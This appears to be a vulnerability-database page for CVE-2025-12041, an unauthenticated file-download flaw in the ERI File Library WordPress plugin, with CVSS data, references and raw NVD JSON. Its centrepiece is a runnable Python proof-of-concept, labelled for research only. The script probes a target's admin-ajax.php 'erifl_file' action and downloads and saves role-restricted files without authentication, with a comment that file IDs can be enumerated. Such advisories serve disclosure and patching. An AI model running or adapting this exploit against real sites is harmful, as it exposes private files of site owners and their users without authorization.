CVE-2025-12041

Description

The ERI File Library plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'erifl_file' AJAX action in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to download files restricted to specific user roles.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ERI File Library plugin for WordPress <= 1.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-12041 PoC - ERI File Library Unauthenticated File Download
Reference: https://www.wordfence.com/threat-intel/vulnerabilities/id/16e1d37a-4eb7-45dc-8993-a501fb2aaf73
"""

import requests
import sys

TARGET_URL = "http://target-wordpress-site.com"
# File ID to download - enumerate or guess based on plugin behavior
FILE_ID = 1

def exploit_unauthenticated_file_download():
    """
    Exploit the missing capability check on erifl_file AJAX action.
    Unauthenticated users can download files restricted to specific roles.
    """
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    
    # Construct the malicious request
    data = {
        "action": "erifl_file",
        "file_id": FILE_ID  # File identifier - can be enumerated
    }
    
    print(f"[*] Sending request to {endpoint}")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] File ID: {FILE_ID}")
    
    try:
        # Send POST request without authentication
        response = requests.post(endpoint, data=data, timeout=30)
        
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Headers: {dict(response.headers)}")
        
        # Check if file was returned
        if response.status_code == 200:
            content_type = response.headers.get('Content-Type', '')
            if 'application' in content_type or 'text' in content_type or 'octet-stream' in content_type:
                print("[+] VULNERABLE! File download successful without authentication")
                print(f"[+] Content-Length: {response.headers.get('Content-Length', 'Unknown')}")
                
                # Save the downloaded content
                with open(f"downloaded_file_{FILE_ID}", "wb") as f:
                    f.write(response.content)
                print(f"[+] File saved as: downloaded_file_{FILE_ID}")
                return True
        
        print("[-] File download may have failed or file not accessible")
        return False
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

def check_vulnerability():
    """
    Check if target is vulnerable by testing the AJAX endpoint.
    """
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    
    # Test with invalid action first to confirm AJAX is working
    test_data = {"action": "erifl_file", "file_id": 999999}
    
    try:
        response = requests.post(endpoint, data=test_data, timeout=10)
        
        # If we get a response (not 403/404), the endpoint exists
        if response.status_code not in [403, 404]:
            print("[*] AJAX endpoint is accessible")
            print(f"[*] Response: {response.text[:200]}")
            return True
        
    except requests.exceptions.RequestException:
        pass
    
    return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    
    print("=" * 60)
    print("CVE-2025-12041 PoC - ERI File Library IDOR Vulnerability")
    print("=" * 60)
    
    if check_vulnerability():
        exploit_unauthenticated_file_download()
    else:
        print("[-] Target may not be vulnerable or not reachable")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12041
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12041
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12041/
[4] VulDB https://vuldb.com/cve/CVE-2025-12041
[5] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3385895%40eri-file-library&new=3385895%40eri-file-library
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/16e1d37a-4eb7-45dc-8993-a501fb2aaf73?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12041", "sourceIdentifier": "[email protected]", "published": "2025-10-31T10:15:42.997", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ERI File Library plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'erifl_file' AJAX action in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to download files restricted to specific user roles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3385895%40eri-file-library&new=3385895%40eri-file-library", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/16e1d37a-4eb7-45dc-8993-a501fb2aaf73?source=cve", "source": "[email protected]"}]}}